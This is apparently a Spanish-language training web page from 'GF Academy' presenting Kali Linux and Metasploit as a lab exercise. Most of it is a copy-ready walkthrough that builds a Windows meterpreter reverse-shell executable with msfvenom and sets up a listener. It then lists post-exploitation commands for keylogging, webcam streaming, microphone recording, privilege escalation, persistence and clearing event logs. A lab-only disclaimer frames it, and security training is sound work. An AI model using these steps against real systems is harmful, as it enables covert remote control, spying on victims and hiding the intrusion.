Volver a Recursos
Guía de AuditoríaKali Linux & Metasploit

Pruebas de Penetración y Auditoría con Kali Linux

Descubre el flujo de trabajo esencial para auditar sistemas en un entorno de laboratorio. Domina los conceptos clave de Kali Linux, la sintaxis de Metasploit y el catálogo de comandos para la inspección y diagnóstico de seguridad.

Aviso Educativo y Entorno Controlado

Esta guía ha sido elaborada estrictamente con fines académicos y de aprendizaje en ciberseguridad. Todo el procedimiento descrito debe ejecutarse únicamente dentro de un laboratorio de pruebas controlado (máquinas virtuales aisladas sin acceso a redes externas). GF Academy promueve la formación ética y responsable del conocimiento técnico.

Conceptos Clave del Entorno

Definiciones esenciales antes de iniciar el procedimiento de auditoría:

01. ¿Qué es Kali Linux?Distribución OS

Kali Linux es una distribución de Linux creada por Offensive Security, enfocada en la seguridad informática, el hacking ético y las pruebas de penetración. Incluye de forma nativa cientos de herramientas como Nmap, Aircrack-ng, Metasploit o John the Ripper para analizar redes, detectar vulnerabilidades y realizar auditorías de seguridad.

02. ¿Qué es MSFCONSOLE?Framework

Metasploit es una herramienta para desarrollar y ejecutar exploits contra una máquina remota. MSFConsole ofrece una práctica interfaz todo en uno para casi todas las opciones disponibles en el Framework, incluyendo el lanzamiento de exploits, carga de módulos auxiliares, enumeración y creación de oyentes.

03. ¿Qué es un Exploit?Mecanismo

Un exploit es el medio por el cual un atacante o pen tester toma ventaja de una falla en un sistema, una aplicación o un servicio para atacar un sistema de manera que dé lugar a un resultado particular deseado que el desarrollador nunca pretendió.

04. ¿Qué es un Payload?Carga Útil

Un payload es el código que queremos que el sistema ejecute y que se va a seleccionar y entregar por el marco. Por ejemplo, un reverse Shell crea una conexión desde el equipo destino hacia el atacante, mientras que un bind Shell une un símbolo del sistema a un puerto de escucha.

Procedimiento Paso a Paso (Pasos 1 al 12)

Sigue la serie de comandos en orden secuencial. Haz clic en "Copiar" para guardar el comando en el portapapeles:

P1

Paso 1. Abrir terminal en Kali Linux

Abre la consola de línea de comandos en tu entorno de Kali Linux.

P2

Paso 2. Ejecutar comando msfvenom

Inicia la herramienta de generación de payloads y artefactos binarios.

$ msfvenom
P3

Paso 3. Verificar la IP local con el comando ifconfig

Identifica la interfaz de red local activa (ej. eth0) y toma nota de tu dirección IP.

$ ifconfig
P4

Paso 4. Generar ejecutable con msfvenom

Compila el archivo ejecutable sustituyendo la IP local y el nombre deseado del archivo.

$ msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=(aquí va la ip) LPORT=443 -f exe -o (Nombre del archivo).exe
P5

Paso 5. Iniciar consola msfconsole

Abre la consola interactiva principal del framework Metasploit.

$ msfconsole
P6

Paso 6. Cargar el controlador de escucha

Selecciona el módulo genérico para recibir la conexión entrante.

$ use exploit/multi/handler
P7

Paso 7. Definir el payload correspondiente

Establece el payload que coincide con el archivo generado previamente.

$ set payload windows/meterpreter/reverse_tcp
P8

Paso 8. Ingresar la IP local (LHOST)

Asigna tu dirección IP de escucha registrada en el paso 3.

$ set LHOST (Ingresar IP)
P9

Paso 9. Ingresar el puerto de escucha (LPORT)

Asigna el puerto de comunicación (ejemplo: 443).

$ set LPORT 443
P10

Paso 10. Verificar las opciones configuradas

Despliega el estado de las variables configuradas para confirmar los valores.

$ show options
P11

Paso 11. Iniciar la escucha del controlador

Inicia el proceso a la espera de la conexión en el puerto definido.

$ exploit
P12

Paso 12. Verificación del estado y ejecución de comandos

En este punto el archivo infectado ya está creado, es cuestión de pasar el archivo a la máquina de prueba para iniciar la ejecución.

Comandos de Inspección y Consulta (14 Comandos)

14 Comandos
#13
sysinfo

Muestra información detallada del sistema operativo y arquitectura de la máquina de prueba.

#14
getsystem

Intenta la elevación de privilegios en el sistema.

#15
ipconfig

Muestra la configuración de red y direcciones IP de la máquina de destino.

#16
screenshot

Captura una imagen del escritorio activo en la máquina.

#17
keyscan_start

Inicia la captura de entradas del teclado en memoria.

#18
keyscan_dump

Muestra en consola las teclas capturadas durante la sesión.

#19
keyscan_stop

Detiene el proceso de captura del teclado.

#20
run persistence -X

Configura la ejecución automática de la tarea al reiniciar el sistema.

#21
execute -f (task name)

Ejecuta un programa o proceso en la máquina de destino.

#22
shell

Abre la consola de comandos de línea (command prompt / cmd) interactiva.

#23
webcam_list

Muestra el listado de cámaras web disponibles en la máquina.

#24
webcam_stream (num de camara)

Inicia la transmisión de video de la cámara seleccionada.

#25
Ctrl + C y enter

Cancela la transmisión activa de video o proceso en consola.

#26
record_mic -d 10

Graba audio del micrófono durante la cantidad de segundos especificada (ej. 10s).

#27
clearev

Limpia los registros de eventos e historial de auditoría en la máquina.

¿Cómo Funciona el Laboratorio en Conjunto?

Para comprender la relación entre todos los pasos sin perderse en la sintaxis, el flujo de trabajo de la prueba se divide en 3 fases clave:

Fase 1: Preparación

Generación del Artefacto

Con msfvenom compilas el ejecutable binario indicando tu IP local (LHOST) y puerto de escucha (LPORT).

Fase 2: Conexión

Escucha del Controlador

En msfconsole utilizas multi/handler para activar el puerto asignado a la espera de recibir el enlace desde la máquina de prueba.

Fase 3: Auditoría

Consulta e Inspección

Una vez establecida la sesión de prueba, utilizas el catálogo de 14 comandos (sysinfo, ipconfig, screenshot) para examinar el estado del sistema.


Resumen del Laboratorio

4 Conceptos Base

Explicaciones de Kali Linux, MSFConsole, Exploit y Payload.

12 Pasos Secuenciales

Guía de comandos desde abrir la terminal hasta ejecutar la escucha del controlador.

14 Comandos de Inspección

Catálogo de 14 comandos de consulta e inspección integrados en el paso final.